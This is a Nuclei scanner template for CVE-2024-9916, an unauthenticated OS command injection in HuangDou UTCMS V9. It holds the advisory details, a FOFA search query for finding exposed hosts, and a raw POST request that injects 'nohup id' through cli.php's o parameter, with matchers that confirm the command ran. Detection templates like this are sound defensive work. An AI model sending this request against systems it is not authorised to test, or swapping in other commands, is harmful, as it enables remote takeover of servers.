id: CVE-2024-9916 info: name: HuangDou UTCMS V9 - OS Command Injection author: iamnoooob,pdresearch severity: high description: | A vulnerability, which was classified as critical, has been found in HuangDou UTCMS V9. Affected by this issue is some unknown functionality of the file app/modules/ut-cac/admin/cli.php. The manipulation of the argument o leads to os command injection.The attack may be launched remotely. The exploit has been disclosed to the public and may be used.The vendor was contacted early about this disclosure but did not respond in any way. impact: | Unauthenticated attackers can execute arbitrary OS commands on the server through command injection in the cli.php file, achieving complete system compromise and potential access to sensitive data. remediation: | Apply security patches from HuangDou for UTCMS V9 to address the OS command injection vulnerability in app/modules/ut-cac/admin/cli.php. reference: - https://vuldb.com/?ctiid.280244 - https://nvd.nist.gov/vuln/detail/CVE-2024-9916 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 cve-id: CVE-2024-9916 cwe-id: CWE-78 epss-score: 0.73666 epss-percentile: 0.99402 cpe: cpe:2.3:a:usualtool:usualtoolcms:9.0:*:*:*:*:*:*:* metadata: vendor: usualtool product: usualtoolcms verified: true max-request: 1 fofa-query: body="usualtool" tags: cve,cve2024,huangdou,utc,rce,php,vkev,vuln http: - raw: - | POST /app/modules/ut-cac/admin/cli.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded o=nohup id matchers-condition: and matchers: - type: word part: body words: - '~]#nohup id run complete.' - 'uid=' - 'gid=' condition: and - type: status status: - 200 # digest: 4b0a004830460221008af10be97489293891451ac8e27cc827cf8e154403a82f7d8402106e5b15fcf0022100f20d6b6ad20f6cef28672d106a9303e2f3359fb4cae35155f07b8934353a2b52:922c64590222798bb761d5b6d8e72950